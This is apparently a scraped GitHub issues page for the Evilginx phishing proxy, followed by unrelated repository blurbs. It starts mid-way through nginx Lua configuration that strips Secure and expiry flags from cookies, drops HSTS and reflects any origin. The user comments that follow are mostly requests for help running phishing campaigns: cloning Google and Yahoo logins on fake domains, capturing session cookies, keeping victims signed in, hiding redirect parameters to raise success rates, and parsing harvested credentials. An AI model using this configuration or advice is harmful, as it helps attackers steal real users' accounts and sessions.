local c_rd = string.match(ngx.var.http_cookie, "{{SUCCESS_ARG}}=([^;]*)")
if c_rc ~= nil and c_rd ~= nil then
ngx.redirect(c_rc)
end
end
}
header_filter_by_lua_block {
function get_cookies()
local cookies = ngx.header.set_cookie or {}
if type(cookies) == "string" then
cookies = {cookies}
end
return cookies
end
function add_cookie(cookie)
local cookies = get_cookies()
table.insert(cookies, cookie)
ngx.header.set_cookie = cookies
end
function exists_cookie(cookie)
local cookies = get_cookies()
for i, val in ipairs(cookies) do
if string.match(val, "^" .. cookie .. "=") ~= nil then
return true
end
end
return false
end
ngx.header["Strict-Transport-Security"] = {}
if ngx.var.http_origin ~= nil then
ngx.header["Access-Control-Allow-Origin"] = ngx.var.http_origin
end
if ngx.var.redir ~= "" then
local r_url = ngx.var.redir
if string.sub(r_url,1,1) == '0' then
val = string.sub(ngx.var.redir, 2)
r_url = ngx.decode_base64(val)
end
add_cookie("{{REDIR_ARG}}=" .. ngx.escape_uri(r_url) .. "; path=/")
end
if ngx.header.location then
end
if ngx.var.http_cookie ~= nil then
local c_rc = string.match(ngx.var.http_cookie, "{{REDIR_ARG}}=([^;]*)")
local c_rd = string.match(ngx.var.http_cookie, "{{SUCCESS_ARG}}=([^;]*)")
if c_rc ~= nil then
if exists_cookie(ngx.var.auth_token) or c_rd ~= nil then
ngx.header.location = ngx.unescape_uri(c_rc)
add_cookie("{{SUCCESS_ARG}}=true; path=/")
end
end
end
if ngx.header.set_cookie then
local cookies = ngx.header.set_cookie
if not cookies then return end
if type(cookies) ~= "table" then cookies = {cookies} end
local newcookies = {}
local allcookies = ""
for i, val in ipairs(cookies) do
val = string.gsub(val, '; *[mM]ax%-[aA]ge=[^;]*', "")
val = string.gsub(val, '; *[eE]xpires=[^;]*', "")
val = string.gsub(val, '; *[sS]ecure', "")
table.insert(newcookies, val)
if i>1 then allcookies = allcookies .. "||" end
allcookies = allcookies .. val
end
ngx.header.set_cookie = newcookies
ngx.var.set_cookies_all = allcookies
end
}
}
}
Also(this is unrelated): in the .conf files for each site, you have sub_filter_types text/html application/json;
set unnecessarily, text/html is already set by default. This causes [warn] duplicate MIME type "text/html" in /etc/nginx/sites-enabled/site.com.conf
warning everytime the page is requested, everything still works but the error.log gets full pretty quick.
I have setup EvilGinx and generated the url's.
The url is - https://accounts.security-logs.com
The issue is that after entering E-Mail and clicking NEXT, nothing happens.
Please help.
TIA
hi,
i am making a config for yahoo and have problem with set-cookies header. it is:
set-cookie: AS=v=1&s=MGDmtRQc; path=/; domain=.login.yahoo.com; secure; HttpOnly
and as you see it have secure flag. i think library can't change domain so it pass to browser with wrong domain and can't set in cookies storage (our fake domain is e.g: fakeyahoo.com). do you have any idea?
thanks
Synchronizing state of nginx.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable nginx
Job for nginx.service failed because the control process exited with error code.
See "systemctl status nginx.service" and "journalctl -xe" for details.
[-] Failed to start Nginx daemon.
Then I type
nginx -t -c /etc/nginx/nginx.conf
root@loyal:~/Desktop/evilginx# nginx -t -c /etc/nginx/nginx.conf
nginx: [emerg] dlopen() "/etc/nginx/nginx/modules/ngx_http_auth_pam_module.so" failed (/etc/nginx/nginx/modules/ngx_http_auth_pam_module.so: cannot open shared object file: No such file or directory) in /etc/nginx/modules-enabled/50-mod-http-auth-pam.conf:1
nginx: configuration file /etc/nginx/nginx.conf test failed
any solution? thanks anyway
phishing link is re-opened, how to config keep he/she will again sign-in??thanks
Hi, Do you look at google password reset ever? i configured the myaccount sub domain and the problem is when it verify password for second time you can't get back to your domain and will redirect to their website.
In other word can we see myaccount.google.com as myaccount.fake.com and it show our username and we see that we are login.
I want after authorize see the myaccount page that say i am login. (on the fake domain.)
Regards
If you send out a link for phishing this link should consists of a domain and an ID at max:
http://my-site.com/ServiceLogin?id=1234567890
The RC and RT should be mapped in the backend to an uniq ID and not presented to the victim as this is minimizing the success rate drastically if you see an url like this:
http://my-site.com/ServiceLogin?rc=http://my-real-site.com/login&rt=Session
I'm using Kali Linux 2017.1 on VMWare and the distro is based on Debian...but it still gives this error running
# ./install.sh
Hi,
Would appreciate if you can add a yahoo config to the templates.
Can you also do a tutorial on adding our own configs for sites?
python /root/tools/evilginx/evilginx_parser.py -i /var/log/evilginx-google.log -o /tmp/logs -c google.creds -x
[-] creds config corrupted.
Hello!
It's necessary to filter usernames for special chars - when "/" appears in username (for example in OWA logins) there is a problem to parse. I replaced "/" and "" to "-" in filenames.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.